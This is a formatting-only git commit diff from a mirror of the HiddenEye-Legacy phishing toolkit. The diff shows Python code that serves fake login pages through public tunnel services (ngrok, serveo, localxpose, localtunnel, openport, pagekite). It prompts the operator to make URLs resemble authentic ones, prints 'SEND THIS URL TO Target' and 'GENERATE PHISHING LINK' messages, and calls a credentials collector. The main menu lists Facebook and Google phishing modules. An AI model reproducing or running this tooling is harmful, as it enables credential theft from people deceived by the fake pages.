mirror of
https://github.com/DarkSecDevelopers/HiddenEye-Legacy.git
synced 2024-03-22 21:12:55 +08:00
Restyled by yapf
This commit is contained in:
parent
ac808f6554
commit
a5357ea82a
|
@ -85,9 +85,9 @@ def set_php(host="127.0.0.1", port=80):
|
|||
|
||||
|
||||
def set_port(port=80):
|
||||
run_background_command(
|
||||
["fuser", "-k", "{0}/tcp".format(port)], stdout=DEVNULL, stderr=DEVNULL
|
||||
)
|
||||
run_background_command(["fuser", "-k", "{0}/tcp".format(port)],
|
||||
stdout=DEVNULL,
|
||||
stderr=DEVNULL)
|
||||
|
||||
|
||||
def start_server(port=80):
|
||||
|
@ -108,10 +108,8 @@ def start_localhost(port):
|
|||
|
||||
enter_server_www
|
||||
set_php(host, port)
|
||||
print(
|
||||
localization.lang_start_localhost["starting_server_on_addr"]
|
||||
+ "{0}:{1}".format(host, port)
|
||||
)
|
||||
print(localization.lang_start_localhost["starting_server_on_addr"] +
|
||||
"{0}:{1}".format(host, port))
|
||||
run_command("clear")
|
||||
|
||||
print(global_localization.hidden_eye_logo)
|
||||
|
@ -121,10 +119,8 @@ def start_localhost(port):
|
|||
print(localization.lang_start_localhost["running_localhost_server"])
|
||||
|
||||
print(localization.lang_start_localhost["send_this_url_suggestion"])
|
||||
print(
|
||||
localization.lang_start_localhost["localhost_url"]
|
||||
+ "{0}:{1}\n".format(host, port)
|
||||
)
|
||||
print(localization.lang_start_localhost["localhost_url"] +
|
||||
"{0}:{1}\n".format(host, port))
|
||||
|
||||
|
||||
def start_ngrok(port):
|
||||
|
@ -141,12 +137,13 @@ def start_ngrok(port):
|
|||
wait(2)
|
||||
ngrok_tunnels = ngrok.get_tunnels()
|
||||
url = ngrok_tunnels[0].public_url
|
||||
if regular_expression.match("https://[0-9a-z]*\.ngrok.io", url) is not None:
|
||||
if regular_expression.match("https://[0-9a-z]*\.ngrok.io",
|
||||
url) is not None:
|
||||
print(localization.lang_start_ngrok["send_this_url_suggestion"])
|
||||
print(
|
||||
localization.lang_start_localhost["localhost_url"] + "127.0.0.1:" + port
|
||||
)
|
||||
print(localization.lang_start_ngrok["ngrok_url"] + url + default_palette[4])
|
||||
print(localization.lang_start_localhost["localhost_url"] +
|
||||
"127.0.0.1:" + port)
|
||||
print(localization.lang_start_ngrok["ngrok_url"] + url +
|
||||
default_palette[4])
|
||||
break
|
||||
|
||||
|
||||
|
@ -183,17 +180,14 @@ def start_serveo(port):
|
|||
)
|
||||
wait(8)
|
||||
try:
|
||||
output = check_output(
|
||||
"grep -o '.\{0,0\}http.\{0,100\}' link.url", shell=True
|
||||
)
|
||||
output = check_output("grep -o '.\{0,0\}http.\{0,100\}' link.url",
|
||||
shell=True)
|
||||
url = output.decode("utf-8")
|
||||
print(localization.lang_start_serveo["send_this_url_suggestion"])
|
||||
print(
|
||||
localization.lang_start_localhost["localhost_url"] + "127.0.0.1:" + port
|
||||
)
|
||||
print(
|
||||
localization.lang_start_serveo["serveo_url"] + url + default_palette[4]
|
||||
)
|
||||
print(localization.lang_start_localhost["localhost_url"] +
|
||||
"127.0.0.1:" + port)
|
||||
print(localization.lang_start_serveo["serveo_url"] + url +
|
||||
default_palette[4])
|
||||
except CalledProcessError:
|
||||
wait(4)
|
||||
run_command("clear")
|
||||
|
@ -205,7 +199,8 @@ def start_serveo(port):
|
|||
print(global_localization.by_darksec)
|
||||
print(global_localization.line_of_dots)
|
||||
print(localization.lang_start_serveo["serveo_custom_server"])
|
||||
print(localization.lang_start_serveo["make_url_simmilar_to_real_suggestion"])
|
||||
print(localization.
|
||||
lang_start_serveo["make_url_simmilar_to_real_suggestion"])
|
||||
print(localization.lang_start_serveo["insert_custom_subdomain"])
|
||||
lnk = input(global_localization.input_line)
|
||||
run_background_command(
|
||||
|
@ -236,19 +231,18 @@ def start_serveo(port):
|
|||
print(global_localization.line_of_dots)
|
||||
print(localization.lang_start_serveo["serveo_custom_server"])
|
||||
print(localization.lang_start_serveo["send_this_url_suggestion"])
|
||||
print(
|
||||
localization.lang_start_localhost["localhost_url"] + "127.0.0.1:" + port
|
||||
)
|
||||
print(
|
||||
localization.lang_start_serveo["serveo_url"] + lnk + default_palette[4]
|
||||
)
|
||||
print(localization.lang_start_localhost["localhost_url"] +
|
||||
"127.0.0.1:" + port)
|
||||
print(localization.lang_start_serveo["serveo_url"] + lnk +
|
||||
default_palette[4])
|
||||
|
||||
print("\n")
|
||||
|
||||
except CalledProcessError:
|
||||
print(localization.lang_start_serveo["failed_to_get_domain"])
|
||||
print(localization.lang_start_serveo["suggestion_to_fix_issue"])
|
||||
print(localization.lang_start_serveo["you_can_try_to_select_other_domain"])
|
||||
print(localization.
|
||||
lang_start_serveo["you_can_try_to_select_other_domain"])
|
||||
wait(4)
|
||||
run_command("clear")
|
||||
return custom(port)
|
||||
|
@ -291,12 +285,12 @@ def start_localxpose(port):
|
|||
pass
|
||||
else:
|
||||
if simple_informant.check_platform(
|
||||
"system"
|
||||
) == "Linux" and simple_informant.check_platform("architecture" == "x86_64"):
|
||||
"system") == "Linux" and simple_informant.check_platform(
|
||||
"architecture" == "x86_64"):
|
||||
localxpose_url = "https://lxpdownloads.sgp1.digitaloceanspaces.com/cli/loclx-linux-amd64.zip"
|
||||
elif simple_informant.check_platform(
|
||||
"system"
|
||||
) == "Linux" and simple_informant.check_platform("architecture" == "aarch64"):
|
||||
"system") == "Linux" and simple_informant.check_platform(
|
||||
"architecture" == "aarch64"):
|
||||
localxpose_url = "https://lxpdownloads.sgp1.digitaloceanspaces.com/cli/loclx-linux-arm64.zip"
|
||||
with url_request.urlopen(localxpose_url) as loclxzip:
|
||||
with ZipFile(BytesIO(loclxzip.read())) as zip_file:
|
||||
|
@ -324,20 +318,18 @@ def start_localxpose(port):
|
|||
stderr=DEVNULL,
|
||||
)
|
||||
try:
|
||||
output = check_output(
|
||||
"grep -o '.\{0,0\}https.\{0,100\}' link.url", shell=True
|
||||
)
|
||||
output = check_output("grep -o '.\{0,0\}https.\{0,100\}' link.url",
|
||||
shell=True)
|
||||
url = output.decode("utf-8")
|
||||
print(
|
||||
"\n{0}[{1}!{0}]{1} SEND THIS LOCALXPOSE URL TO Target-\n\n{0}[{1}*{0}]{1} Localhost URL: {2}http://127.0.0.1:{3}\n{0}[{1}*{0}]{1} LOCALXPOSE URL: {2}{4}{1}".format(
|
||||
"\n{0}[{1}!{0}]{1} SEND THIS LOCALXPOSE URL TO Target-\n\n{0}[{1}*{0}]{1} Localhost URL: {2}http://127.0.0.1:{3}\n{0}[{1}*{0}]{1} LOCALXPOSE URL: {2}{4}{1}"
|
||||
.format(
|
||||
default_palette[0],
|
||||
default_palette[4],
|
||||
default_palette[3],
|
||||
port,
|
||||
url,
|
||||
)
|
||||
+ "{0}".format(default_palette[4])
|
||||
)
|
||||
) + "{0}".format(default_palette[4]))
|
||||
print("\n")
|
||||
except CalledProcessError:
|
||||
|
||||
|
@ -347,84 +339,61 @@ def start_localxpose(port):
|
|||
|
||||
def custom(port):
|
||||
|
||||
print(
|
||||
"""
|
||||
print("""
|
||||
{1}_ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1}
|
||||
|__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1}
|
||||
| | | ]__| ]__| |__ | \| {0}|__ || |__{1}
|
||||
{0}http://github.com/darksecdevelopers
|
||||
{0}** BY:DARKSEC ** \n\n-------------------------------\n{0}[ CREATE A CUSTOM URL HERE ]{1}!! {0}\n-------------------------------\n\n{0}[{1}!{0}]{1} YOU CAN MAKE YOUR URL SIMILAR TO AUTHENTIC URL.\n\n{0}Insert a custom subdomain for Localxpose(Ex: mysubdomain)""".format(
|
||||
default_palette[0], default_palette[2]
|
||||
)
|
||||
)
|
||||
lnk = input(
|
||||
"\n{0}CUSTOM Subdomain>>> {1}".format(
|
||||
default_palette[0], default_palette[2]
|
||||
)
|
||||
)
|
||||
{0}** BY:DARKSEC ** \n\n-------------------------------\n{0}[ CREATE A CUSTOM URL HERE ]{1}!! {0}\n-------------------------------\n\n{0}[{1}!{0}]{1} YOU CAN MAKE YOUR URL SIMILAR TO AUTHENTIC URL.\n\n{0}Insert a custom subdomain for Localxpose(Ex: mysubdomain)"""
|
||||
.format(default_palette[0], default_palette[2]))
|
||||
lnk = input("\n{0}CUSTOM Subdomain>>> {1}".format(
|
||||
default_palette[0], default_palette[2]))
|
||||
run_command(
|
||||
"./Server/loclx tunnel http --to :%s --subdomain %s > link.url 2> /dev/null &"
|
||||
% (port, lnk)
|
||||
)
|
||||
% (port, lnk))
|
||||
wait(7)
|
||||
try:
|
||||
output = check_output(
|
||||
"grep -o '.\{0,0\}https.\{0,100\}' link.url", shell=True
|
||||
)
|
||||
output = check_output("grep -o '.\{0,0\}https.\{0,100\}' link.url",
|
||||
shell=True)
|
||||
url = output.decode("utf-8")
|
||||
run_command("clear")
|
||||
print(
|
||||
"""
|
||||
print("""
|
||||
{1}_ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1}
|
||||
|__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1}
|
||||
| | | ]__| ]__| |__ | \| {0}|__ || |__{1}
|
||||
{0}http://github.com/darksecdevelopers
|
||||
{0}** BY:DARKSEC ** \n\n-------------------------------\n{0}[ CUSTOM SERVEO URL ]{1}!! {0}\n-------------------------------""".format(
|
||||
default_palette[0], default_palette[2]
|
||||
)
|
||||
)
|
||||
{0}** BY:DARKSEC ** \n\n-------------------------------\n{0}[ CUSTOM SERVEO URL ]{1}!! {0}\n-------------------------------"""
|
||||
.format(default_palette[0], default_palette[2]))
|
||||
print(
|
||||
"\n{0}[{1}!{0}]{1} SEND THIS LOCALXPOSE URL TO Target-\n{0}[{1}*{0}]{1} Localhost URL: {2}http://127.0.0.1:{3}\n{0}[{1}*{0}]{1} LOCALXPOSE URL: {2}".format(
|
||||
default_palette[0], default_palette[2], default_palette[3], port
|
||||
)
|
||||
+ url
|
||||
+ "{0}".format(default_palette[4])
|
||||
)
|
||||
"\n{0}[{1}!{0}]{1} SEND THIS LOCALXPOSE URL TO Target-\n{0}[{1}*{0}]{1} Localhost URL: {2}http://127.0.0.1:{3}\n{0}[{1}*{0}]{1} LOCALXPOSE URL: {2}"
|
||||
.format(default_palette[0], default_palette[2],
|
||||
default_palette[3], port) + url +
|
||||
"{0}".format(default_palette[4]))
|
||||
print("\n")
|
||||
|
||||
except CalledProcessError:
|
||||
print(
|
||||
"""\n\n{0}FAILED TO GET THIS DOMAIN. !!!\n\n{0}LOOKS LIKE CUSTOM URL IS NOT VALID or ALREADY OCCUPIED BY SOMEONE ELSE. !!!\n\n{0}[{1}!{0}]TRY TO SELECT ANOTHER CUSTOM DOMAIN{1} (GOING BACK).. !! \n""".format(
|
||||
default_palette[0], default_palette[4]
|
||||
)
|
||||
)
|
||||
"""\n\n{0}FAILED TO GET THIS DOMAIN. !!!\n\n{0}LOOKS LIKE CUSTOM URL IS NOT VALID or ALREADY OCCUPIED BY SOMEONE ELSE. !!!\n\n{0}[{1}!{0}]TRY TO SELECT ANOTHER CUSTOM DOMAIN{1} (GOING BACK).. !! \n"""
|
||||
.format(default_palette[0], default_palette[4]))
|
||||
wait(4)
|
||||
run_command("clear")
|
||||
return custom(port)
|
||||
|
||||
print(
|
||||
"""
|
||||
print("""
|
||||
{1}_ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1}
|
||||
|__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1}
|
||||
| | | ]__| ]__| |__ | \| {0}|__ || |__{1}
|
||||
{0}http://github.com/darksecdevelopers
|
||||
{0}** BY:DARKSEC ** \n\n-------------------------------\n{0}[ LOCALXPOSE URL TYPE SELECTION ]{1}!! {0}\n-------------------------------\n""".format(
|
||||
default_palette[0], default_palette[2]
|
||||
)
|
||||
)
|
||||
{0}** BY:DARKSEC ** \n\n-------------------------------\n{0}[ LOCALXPOSE URL TYPE SELECTION ]{1}!! {0}\n-------------------------------\n"""
|
||||
.format(default_palette[0], default_palette[2]))
|
||||
print(
|
||||
"\n{0}[{1}*{0}]{0}CHOOSE ANY LOCALXPOSE URL TYPE TO GENERATE PHISHING LINK:{1}".format(
|
||||
default_palette[0], default_palette[2]
|
||||
)
|
||||
)
|
||||
"\n{0}[{1}*{0}]{0}CHOOSE ANY LOCALXPOSE URL TYPE TO GENERATE PHISHING LINK:{1}"
|
||||
.format(default_palette[0], default_palette[2]))
|
||||
print(
|
||||
"\n{0}[{1}1{0}]{1}Custom URL {0}(Generates designed url) \n{0}[{1}2{0}]{1}Random URL {0}(Generates Random url)".format(
|
||||
default_palette[0], default_palette[2]
|
||||
)
|
||||
)
|
||||
choice = input(
|
||||
"\n\n{0}YOUR CHOICE >>> {1}".format(default_palette[0], default_palette[2])
|
||||
)
|
||||
"\n{0}[{1}1{0}]{1}Custom URL {0}(Generates designed url) \n{0}[{1}2{0}]{1}Random URL {0}(Generates Random url)"
|
||||
.format(default_palette[0], default_palette[2]))
|
||||
choice = input("\n\n{0}YOUR CHOICE >>> {1}".format(default_palette[0],
|
||||
default_palette[2]))
|
||||
run_command("clear")
|
||||
if choice == "1":
|
||||
|
||||
|
@ -438,75 +407,52 @@ def start_localxpose(port):
|
|||
|
||||
def start_localtunnel(port, npm):
|
||||
run_command("clear")
|
||||
print(
|
||||
"""
|
||||
print("""
|
||||
{1}_ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1}
|
||||
|__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1}
|
||||
| | | ]__| ]__| |__ | \| {0}|__ || |__{1}
|
||||
{0}http://github.com/darksecdevelopers
|
||||
{0}** BY:DARKSEC ** \n\n-------------------------------\n{0}[ LOCALTUNNEL URL ]{1}!! {0}\n-------------------------------""".format(
|
||||
default_palette[0], default_palette[2]
|
||||
)
|
||||
)
|
||||
{0}** BY:DARKSEC ** \n\n-------------------------------\n{0}[ LOCALTUNNEL URL ]{1}!! {0}\n-------------------------------"""
|
||||
.format(default_palette[0], default_palette[2]))
|
||||
print("\n{0}[{1}*{0}]{0}SELECT ANY URL TYPE TO GENERATE PHISHING LINK:{1}".
|
||||
format(default_palette[0], default_palette[2]))
|
||||
print(
|
||||
"\n{0}[{1}*{0}]{0}SELECT ANY URL TYPE TO GENERATE PHISHING LINK:{1}".format(
|
||||
default_palette[0], default_palette[2]
|
||||
)
|
||||
)
|
||||
print(
|
||||
"\n{0}[{1}+{0}]{1}Type Subdomain for Custom URL. \n{0}[{1}+{0}]{1}Leave Empty For Random URL".format(
|
||||
default_palette[0], default_palette[2]
|
||||
)
|
||||
)
|
||||
s = input(
|
||||
"\n{0}(Localtunnel/Subdomain)> {1}".format(
|
||||
default_palette[0], default_palette[2]
|
||||
)
|
||||
)
|
||||
"\n{0}[{1}+{0}]{1}Type Subdomain for Custom URL. \n{0}[{1}+{0}]{1}Leave Empty For Random URL"
|
||||
.format(default_palette[0], default_palette[2]))
|
||||
s = input("\n{0}(Localtunnel/Subdomain)> {1}".format(
|
||||
default_palette[0], default_palette[2]))
|
||||
try:
|
||||
run_command(
|
||||
"{0}lt -p ".format("" if npm else "Server/")
|
||||
+ port
|
||||
+ ((" -s " + s) if s != "" else s)
|
||||
+ " > link.url &"
|
||||
)
|
||||
run_command("{0}lt -p ".format("" if npm else "Server/") + port +
|
||||
((" -s " + s) if s != "" else s) + " > link.url &")
|
||||
wait(3)
|
||||
run_command("clear")
|
||||
print(
|
||||
"""
|
||||
print("""
|
||||
{1}_ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1}
|
||||
|__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1}
|
||||
| | | ]__| ]__| |__ | \| {0}|__ || |__{1}
|
||||
{0}http://github.com/darksecdevelopers
|
||||
{0}** BY:DARKSEC ** \n\n-------------------------------\n{0}[ LOCALTUNNEL URL ]{1}!! {0}\n-------------------------------""".format(
|
||||
default_palette[0], default_palette[2]
|
||||
)
|
||||
)
|
||||
{0}** BY:DARKSEC ** \n\n-------------------------------\n{0}[ LOCALTUNNEL URL ]{1}!! {0}\n-------------------------------"""
|
||||
.format(default_palette[0], default_palette[2]))
|
||||
print(
|
||||
"\n{0}[{1}!{0}]{1} SEND THIS SERVEO URL TO Target-\n\n{0}[{1}*{0}]{1} Localhost URL: {2}http://127.0.0.1:{3}\n{0}[{1}*{0}]{1} LOCALTUNNEL URL: {2}{4}".format(
|
||||
"\n{0}[{1}!{0}]{1} SEND THIS SERVEO URL TO Target-\n\n{0}[{1}*{0}]{1} Localhost URL: {2}http://127.0.0.1:{3}\n{0}[{1}*{0}]{1} LOCALTUNNEL URL: {2}{4}"
|
||||
.format(
|
||||
default_palette[0],
|
||||
default_palette[2],
|
||||
default_palette[3],
|
||||
port,
|
||||
str(
|
||||
check_output(
|
||||
"grep -o '.\{0,0\}https.\{0,100\}' link.url", shell=True
|
||||
)
|
||||
).strip("b ' \ n r"),
|
||||
)
|
||||
)
|
||||
check_output("grep -o '.\{0,0\}https.\{0,100\}' link.url",
|
||||
shell=True)).strip("b ' \ n r"),
|
||||
))
|
||||
except CalledProcessError:
|
||||
run_command("clear")
|
||||
print(
|
||||
"""
|
||||
print("""
|
||||
{1}_ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1}
|
||||
|__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1}
|
||||
| | | ]__| ]__| |__ | \| {0}|__ || |__{1}
|
||||
{0}http://github.com/darksecdevelopers
|
||||
{0}** BY:DARKSEC ** \n\n-------------------------------\n{0}[ LOCALTUNNEL URL ]{1}!! {0}\n-------------------------------""".format(
|
||||
default_palette[0], default_palette[2]
|
||||
)
|
||||
)
|
||||
{0}** BY:DARKSEC ** \n\n-------------------------------\n{0}[ LOCALTUNNEL URL ]{1}!! {0}\n-------------------------------"""
|
||||
.format(default_palette[0], default_palette[2]))
|
||||
print("{0}error[invalid/preoccupied]{0}".format(default_palette[0]))
|
||||
start_localtunnel(port, npm)
|
||||
|
||||
|
@ -518,95 +464,68 @@ def start_openport(port):
|
|||
run_command("rm output.txt > /dev/null 2>&1")
|
||||
run_command("openport -K && openport %s > output.txt &" % (port))
|
||||
print(
|
||||
"{0}[{1}*{0}] {1}Openport Server Running in Background.. Please wait.".format(
|
||||
default_palette[0], default_palette[4]
|
||||
)
|
||||
)
|
||||
"{0}[{1}*{0}] {1}Openport Server Running in Background.. Please wait."
|
||||
.format(default_palette[0], default_palette[4]))
|
||||
# Sleep time is important as the openport command takes some time to give response link.
|
||||
wait(20)
|
||||
run_command(
|
||||
'cat output.txt | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*" | sort -u | grep -v https://openport.io/user > openport.txt'
|
||||
) # Taking out the neccesary verification link from output txt file of openport (above).
|
||||
print(
|
||||
"{0}[{1}*{0}] {1}Working To Get OpenPort Tunnel Activation Link...".format(
|
||||
default_palette[0], default_palette[4]
|
||||
)
|
||||
)
|
||||
"{0}[{1}*{0}] {1}Working To Get OpenPort Tunnel Activation Link..."
|
||||
.format(default_palette[0], default_palette[4]))
|
||||
with open("openport.txt") as f:
|
||||
read_data = f.read()
|
||||
if "openport.io/l/" in read_data:
|
||||
print(
|
||||
"{0}[{1}*{0}] {1}Got Activation Link...".format(
|
||||
default_palette[0], default_palette[4]
|
||||
)
|
||||
)
|
||||
print("{0}[{1}*{0}] {1}Got Activation Link...".format(
|
||||
default_palette[0], default_palette[4]))
|
||||
else:
|
||||
print(
|
||||
"{0}[{1}^{0}] {1}Failed To Get Openport Activation Link... ".format(
|
||||
default_palette[0], default_palette[4]
|
||||
)
|
||||
)
|
||||
"{0}[{1}^{0}] {1}Failed To Get Openport Activation Link... "
|
||||
.format(default_palette[0], default_palette[4]))
|
||||
output = open("output.txt", "r")
|
||||
output = output.read()
|
||||
print(
|
||||
"{0}[{1}!{0}] {1}Openport Error:\n\n{2}".format(
|
||||
default_palette[0], default_palette[4], output
|
||||
)
|
||||
)
|
||||
input(
|
||||
"\n\n{0}[{1}*{0}] {1}Try Other Tunnels... (Press Enter)".format(
|
||||
default_palette[0], default_palette[4]
|
||||
)
|
||||
)
|
||||
print("{0}[{1}!{0}] {1}Openport Error:\n\n{2}".format(
|
||||
default_palette[0], default_palette[4], output))
|
||||
input("\n\n{0}[{1}*{0}] {1}Try Other Tunnels... (Press Enter)".
|
||||
format(default_palette[0], default_palette[4]))
|
||||
server_selection(port)
|
||||
|
||||
urlFile = open("openport.txt", "r")
|
||||
urltoverify = urlFile.read().strip()
|
||||
print(
|
||||
"{0}[{1}*{0}] {1}Open This Activation Link From Browser to Get Tunnel Link...\n".format(
|
||||
default_palette[0], default_palette[4]
|
||||
)
|
||||
)
|
||||
print(
|
||||
"{0}[{1}*{0}] {1}Tunnel Activation Link:{0}{2} ".format(
|
||||
default_palette[0], default_palette[4], urltoverify
|
||||
)
|
||||
)
|
||||
"{0}[{1}*{0}] {1}Open This Activation Link From Browser to Get Tunnel Link...\n"
|
||||
.format(default_palette[0], default_palette[4]))
|
||||
print("{0}[{1}*{0}] {1}Tunnel Activation Link:{0}{2} ".format(
|
||||
default_palette[0], default_palette[4], urltoverify))
|
||||
url = input(
|
||||
"\n\n{0}[{1}*{0}] {1}Enter The Tunnel Link Found in Browser: {0} ".format(
|
||||
default_palette[0], default_palette[4]
|
||||
)
|
||||
)
|
||||
"\n\n{0}[{1}*{0}] {1}Enter The Tunnel Link Found in Browser: {0} ".
|
||||
format(default_palette[0], default_palette[4]))
|
||||
wait(4)
|
||||
run_command("clear")
|
||||
print(
|
||||
"""
|
||||
print("""
|
||||
{1}_ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1}
|
||||
|__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1}
|
||||
| | | ]__| ]__| |__ | \| {0}|__ || |__{1}
|
||||
{0}http://github.com/darksecdevelopers
|
||||
{0}** BY:DARKSEC ** \n\n-------------------------------\n{0}[ OPENPORT SERVER ]{1}!! {0}\n-------------------------------""".format(
|
||||
default_palette[0], default_palette[4]
|
||||
)
|
||||
)
|
||||
{0}** BY:DARKSEC ** \n\n-------------------------------\n{0}[ OPENPORT SERVER ]{1}!! {0}\n-------------------------------"""
|
||||
.format(default_palette[0], default_palette[4]))
|
||||
print(
|
||||
"\n{0}[{1}!{0}]{1} SEND THIS OPENPORT URL TO Target-\n{0}[{1}*{0}]{1} Localhost URL: {2}http://127.0.0.1:{3}\n{0}[{1}*{0}]{1} OPENPORT URL: {2}{4}\n".format(
|
||||
default_palette[0], default_palette[4], default_palette[3], port, url
|
||||
)
|
||||
)
|
||||
"\n{0}[{1}!{0}]{1} SEND THIS OPENPORT URL TO Target-\n{0}[{1}*{0}]{1} Localhost URL: {2}http://127.0.0.1:{3}\n{0}[{1}*{0}]{1} OPENPORT URL: {2}{4}\n"
|
||||
.format(default_palette[0], default_palette[4], default_palette[3],
|
||||
port, url))
|
||||
|
||||
print(
|
||||
"""{1}_ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1}
|
||||
print("""{1}_ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1}
|
||||
|__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1}
|
||||
| | | ]__| ]__| |__ | \| {0}|__ || |__{1}
|
||||
{0}http://github.com/darksecdevelopers
|
||||
{0}** BY:DARKSEC ** \n\n-------------------------------\n{0}[ OPENPORT SERVER ]{1}!! {0}\n-------------------------------""".format(
|
||||
default_palette[0], default_palette[2]
|
||||
)
|
||||
)
|
||||
{0}** BY:DARKSEC ** \n\n-------------------------------\n{0}[ OPENPORT SERVER ]{1}!! {0}\n-------------------------------"""
|
||||
.format(default_palette[0], default_palette[2]))
|
||||
if 256 == run_command("which openport > /dev/null"):
|
||||
run_command("clear")
|
||||
print("[*] Openport not Installed correctly, Try installing it manually !!")
|
||||
print(
|
||||
"[*] Openport not Installed correctly, Try installing it manually !!"
|
||||
)
|
||||
print("[*] Check Here ... https://openport.io/download")
|
||||
input("\n Press Enter To Go back..")
|
||||
server_selection(port)
|
||||
|
@ -618,16 +537,13 @@ def start_pagekite(port):
|
|||
from Defs.ActionManager.simple_informant import credentials_collector
|
||||
|
||||
run_command("clear")
|
||||
print(
|
||||
"""
|
||||
print("""
|
||||
{1}_ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1}
|
||||
|__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1}
|
||||
| | | ]__| ]__| |__ | \| {0}|__ || |__{1}
|
||||
{0}http://github.com/darksecdevelopers
|
||||
{0}** BY:DARKSEC ** \n\n-------------------------------\n{0}[ PAGEKITE SERVER ]{1}!! {0}\n-------------------------------""".format(
|
||||
default_palette[0], default_palette[2]
|
||||
)
|
||||
)
|
||||
{0}** BY:DARKSEC ** \n\n-------------------------------\n{0}[ PAGEKITE SERVER ]{1}!! {0}\n-------------------------------"""
|
||||
.format(default_palette[0], default_palette[2]))
|
||||
if 256 == run_command("which python2 > /dev/null"):
|
||||
print("[*] Python2 not Installed, Pagekite Only Supports Python2!!")
|
||||
input("\n Press Enter To Try installing Python2 Now..")
|
||||
|
@ -635,10 +551,8 @@ def start_pagekite(port):
|
|||
if 256 == run_command("which python2 > /dev/null"):
|
||||
run_command("clear")
|
||||
print(
|
||||
"\n{0}[{1}*{0}] {1}FAILED TO INSTALL PYTHON2 (TRY MANUALLY)..{1}".format(
|
||||
default_palette[0], default_palette[4]
|
||||
)
|
||||
)
|
||||
"\n{0}[{1}*{0}] {1}FAILED TO INSTALL PYTHON2 (TRY MANUALLY)..{1}"
|
||||
.format(default_palette[0], default_palette[4]))
|
||||
wait(2)
|
||||
server_selection(port)
|
||||
else:
|
||||
|
@ -646,45 +560,28 @@ def start_pagekite(port):
|
|||
else:
|
||||
try:
|
||||
subdomain = input(
|
||||
"\n{0}[{1}*{0}] {0}Enter A Custom Subdomain Ex.(yourname):\n{0}Custom Subdomain>>> {1}".format(
|
||||
default_palette[0], default_palette[2]
|
||||
)
|
||||
)
|
||||
"\n{0}[{1}*{0}] {0}Enter A Custom Subdomain Ex.(yourname):\n{0}Custom Subdomain>>> {1}"
|
||||
.format(default_palette[0], default_palette[2]))
|
||||
print(
|
||||
"\n{0}[{1}*{0}] {1}Use Temporary Email Services(Don't Harm Anyone).{1}".format(
|
||||
default_palette[0], default_palette[4]
|
||||
)
|
||||
)
|
||||
"\n{0}[{1}*{0}] {1}Use Temporary Email Services(Don't Harm Anyone).{1}"
|
||||
.format(default_palette[0], default_palette[4]))
|
||||
print(
|
||||
"{0}[{1}*{0}] {1}Sometime Email verification Required by Pagekite(Stay Alert){1}".format(
|
||||
default_palette[0], default_palette[4]
|
||||
)
|
||||
)
|
||||
"{0}[{1}*{0}] {1}Sometime Email verification Required by Pagekite(Stay Alert){1}"
|
||||
.format(default_palette[0], default_palette[4]))
|
||||
print(
|
||||
"{0}[{1}*{0}] {1}You can also get various subdomain assigned to your subdomain.{1}".format(
|
||||
default_palette[0], default_palette[4]
|
||||
)
|
||||
)
|
||||
"{0}[{1}*{0}] {1}You can also get various subdomain assigned to your subdomain.{1}"
|
||||
.format(default_palette[0], default_palette[4]))
|
||||
print(
|
||||
"{0}[{1}*{0}] {1}Check Control Panel Of pagekite at https://pagekite.net/ .{1}".format(
|
||||
default_palette[0], default_palette[4]
|
||||
)
|
||||
)
|
||||
"{0}[{1}*{0}] {1}Check Control Panel Of pagekite at https://pagekite.net/ .{1}"
|
||||
.format(default_palette[0], default_palette[4]))
|
||||
print(
|
||||
"{0}[{1}*{0}] {1}We are Ready to Launch Pagekite.Press CTRL+C Whenever Need captured Data.{1}".format(
|
||||
default_palette[0], default_palette[4]
|
||||
)
|
||||
)
|
||||
input(
|
||||
"\n{0}[{1}*{0}] {0}Press Enter To Launch The Pagekite...{1}".format(
|
||||
default_palette[0], default_palette[4]
|
||||
)
|
||||
)
|
||||
"{0}[{1}*{0}] {1}We are Ready to Launch Pagekite.Press CTRL+C Whenever Need captured Data.{1}"
|
||||
.format(default_palette[0], default_palette[4]))
|
||||
input("\n{0}[{1}*{0}] {0}Press Enter To Launch The Pagekite...{1}".
|
||||
format(default_palette[0], default_palette[4]))
|
||||
run_command(
|
||||
"python2 Server/pagekite.py --clean --signup {0} {1}.pagekite.me".format(
|
||||
port, subdomain
|
||||
)
|
||||
)
|
||||
"python2 Server/pagekite.py --clean --signup {0} {1}.pagekite.me"
|
||||
.format(port, subdomain))
|
||||
except KeyboardInterrupt:
|
||||
print("[!] Please Copy the Generated Link For Further Use")
|
||||
credentials_collector(port)
|
||||
|
|
|
@ -34,9 +34,11 @@ def start_main_menu():
|
|||
print(localization.lang_start_main_menu["down_line"])
|
||||
print(localization.lang_start_main_menu["attack_vector_message"])
|
||||
print(localization.lang_start_main_menu["phishing_modules_header"])
|
||||
print_sorted_as_menu(localization.lang_start_main_menu["phishing_modules_list"])
|
||||
print_sorted_as_menu(
|
||||
localization.lang_start_main_menu["phishing_modules_list"])
|
||||
print(localization.lang_start_main_menu["additional_modules"])
|
||||
print_sorted_as_menu(localization.lang_start_main_menu["additional_modules_list"])
|
||||
print_sorted_as_menu(
|
||||
localization.lang_start_main_menu["additional_modules_list"])
|
||||
|
||||
option = input(global_localization.input_line)
|
||||
option = option.zfill(2)
|
||||
|
@ -44,16 +46,14 @@ def start_main_menu():
|
|||
module_loading_message("Facebook")
|
||||
print(localization.lang_start_main_menu["operation_mode"])
|
||||
print_sorted_as_menu(
|
||||
localization.lang_start_main_menu["facebook_operation_modes"]
|
||||
)
|
||||
localization.lang_start_main_menu["facebook_operation_modes"])
|
||||
customOption = input(global_localization.input_line)
|
||||
start_phishing_page("Facebook", customOption)
|
||||
elif option == "02":
|
||||
module_loading_message("Google")
|
||||
print(localization.lang_start_main_menu["operation_mode"])
|
||||
